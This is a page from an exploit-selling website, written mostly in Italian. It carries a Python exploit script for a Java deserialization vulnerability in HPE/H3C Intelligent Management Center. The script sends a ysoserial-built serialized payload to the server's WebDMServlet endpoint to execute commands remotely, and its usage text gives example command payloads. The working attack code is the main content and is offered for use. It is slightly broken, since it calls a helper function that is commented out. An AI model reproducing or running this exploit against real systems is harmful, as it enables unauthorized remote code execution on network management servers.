0day.today - Il più grande database di exploit nel mondo.
![](/img/logo_green.jpg)
Utilizziamo un dominio principale DOMAIN_LINK
Se vuoi acquistare l'exploit o ottenerlo, devi comprare i Gold. Non vogliamo che utilizzi i tool di hacking per atttività illecite sul nostro sito web, quindi ogni azione può avere effetti illegali su utenti e sul nostro sito web verrai bannato. ed il tuo account con i tuoi dati verranno distrutti.
L'amministrazione del sito usa contatti ufficiali. Attenzione agli istruttori!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Leggere il [ accordo ]
- Leggere il [ Submit ] regole
- Visita il [ faq ] page
- [ Registrati ] profilo
- ottieni [ Oro ]
- Se vuoi [ vendere ]
- Se vuoi [ comprare ]
- se hai perso [ Account ]
- Qualsiasi domanda [ [email protected] ]
- Autorizzazione della Pagina
- Registrazione della pagina
- Ripristina l'account della pagina
- FAQ pagina
- Pagina dei contatti
- Regole di pubblicazione
- Pagina degli accordi
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Ci puoi contattare tramite:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
HPE < 7.2 - Java Deserialization Exploit
Autore
Rischio
![](/img/risk/critlow_3.gif)
Security Risk High
]0day-ID
Categoria
Data inserimento
CVE
Piattaforma
#!/usr/bin/env python ######################################################################################################## # # HPE/H3C IMC - Java Deserialization Exploit # # Version 0.1 # Tested on Windows Server 2008 R2 # Name HPE/H3C IMC (Intelligent Management Center) Java 1.8.0_91 # # Author: # Raphael Kuhn (Daimler TSS) # # Special thanks to: # Jan Esslinger (@H_ng_an) for the websphere exploit this one is based upon # ####################################################################################################### import requests import sys import os import os.path from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) host = "127.0.0.1:8080" payload_file = "payload.bin" body = "" def printUsage () : print "......................................................................................................................" print "." print ". HPE/H3C - IMC Java Deserialization Exploit" print "." print ". Example 1: -payload-binary" print ". [-] Usage: %s http[s]://<IP>:<PORT> -payload-binary payload" % sys.argv[0] print ". [-] Example: %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0] print ". 1. Create payload with ysoserial.jar (https://github.com/frohoff/ysoserial/releases) " print ". java -jar ysoserial.jar CommonsCollections3 'cmd.exe /c ping -n 1 53.48.79.183' > ysoserial_payload.bin" print ". 2. Send request to server" print ". %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0] print "." print ". Example 2: -payload-string" print '. [-] Usage: %s http[s]://<IP>:<PORT> -payload-string "payload"' % sys.argv[0] print '. [-] Example: %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0] print ". 1. Send request to server with payload as string (need ysoserial.jar in the same folder)" print '. %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0] print "." print "......................................................................................................................" def loadPayloadFile (_fileName) : print "[+] Load payload file %s" % _fileName payloadFile = open(_fileName, 'rb') payloadFile_read = payloadFile.read() return payloadFile_read def exploit (_payload) : url = sys.argv[1] url += "/imc/topo/WebDMServlet" print "[+] Sending exploit to %s" % (url) data = _payload response = requests.post(url, data=data, verify=False) return response #def showResponse(_response): # r = response # m = r.search(_response) # if (m.find("java.lang.NullPointerException")): # print "[+] Found java.lang.NullPointerException, exploit finished successfully (hopefully)" # else: # print "[-] ClassCastException not found, exploit failed" if __name__ == "__main__": if len(sys.argv) < 4: printUsage() sys.exit(0) else: print "------------------------------------------" print "- HPE/H3C - IMC Java Deserialization Exploit -" print "------------------------------------------" host = sys.argv[1] print "[*] Connecting to %s" %host if sys.argv[2] == "-payload-binary": payload_file = sys.argv[3] if os.path.isfile(payload_file): payload = loadPayloadFile(payload_file) response = exploit(payload) showResponse(response.content) else: print "[-] Can't load payload file" elif sys.argv[2] == "-payload-string": if os.path.isfile("ysoserial.jar"): sPayload = sys.argv[3] sPayload = "java -jar ysoserial.jar CommonsCollections5 '" +sPayload+ "' > payload.bin" print "[+] Create payload file (%s) " %sPayload os.system(sPayload) payload = loadPayloadFile(payload_file) response = exploit(payload) print "[+] Response received, exploit finished." else: print "[-] Can't load ysoserial.jar" else: printUsage() # 0day.today [2024-07-04] #